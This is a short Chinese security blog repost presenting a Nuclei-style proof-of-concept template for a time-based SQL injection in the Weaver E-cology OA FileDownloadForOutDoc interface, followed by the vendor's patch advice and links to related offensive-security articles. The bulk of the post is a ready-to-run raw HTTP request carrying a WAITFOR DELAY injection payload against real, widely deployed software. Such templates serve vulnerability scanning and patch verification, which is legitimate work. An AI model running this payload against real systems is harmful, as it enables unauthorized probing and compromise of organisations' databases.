泛微 E-cology SQL注入漏洞 POC

2023年7月14日12:01:51评论147 views字数 598阅读1分59秒阅读模式

id: ecology-oa-filedownloadforoutdoc-sqli
info:  name: EcologyOA filedownloadforoutdoc - SQL injection  author: unknown  severity: critical  description: EcologyOA filedownloadforoutdoc interface has SQL injection  tags: ecology-oa,sqli
requests:  - raw:      - |        POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1        Host: {{Hostname}}        Accept: */*        Accept-Encoding: gzip, deflate        Accept-Language: zh-CN,zh;q=0.9        Connection: close        
        fileid=2+WAITFOR DELAY+'0:0:5'&isFromOutImg=1    matchers:      - type: dsl        dsl:          - 'duration>=5'

泛微 E-cology SQL注入漏洞 POC

官方修复方案

目前官方已发布安全补丁，建议受影响用户尽快将补丁版本升级至10.58及以上。

https://www.weaver.com.cn/cs/securityDownload.asp#

原文始发于微信公众号（Khan安全攻防实验室）：泛微 E-cology SQL注入漏洞 POC

左青龙
微信扫一扫

右白虎
微信扫一扫

泛微 E-cology SQL注入漏洞 POC

2024护网经验学习（一）

API未授权访问到进入系统

Hack The Box——Perfection笔记

漏洞检查表 :vulnerability-Checklist

前端Js解密小技巧|JS逆向

DarkGPT：基于GPT-4对泄露的数据库执行查询的AI助手

在Windows 11 上红队使用 PE进行AV 规避

网络安全扫盲篇名词解释之挖矿

Linux 网络 ELI5 — 第 2 部分，IP、NAT 和 DHCP

攻防演练中如何利用Hook绕过EDR的内存保护

发表评论

在线咨询

微信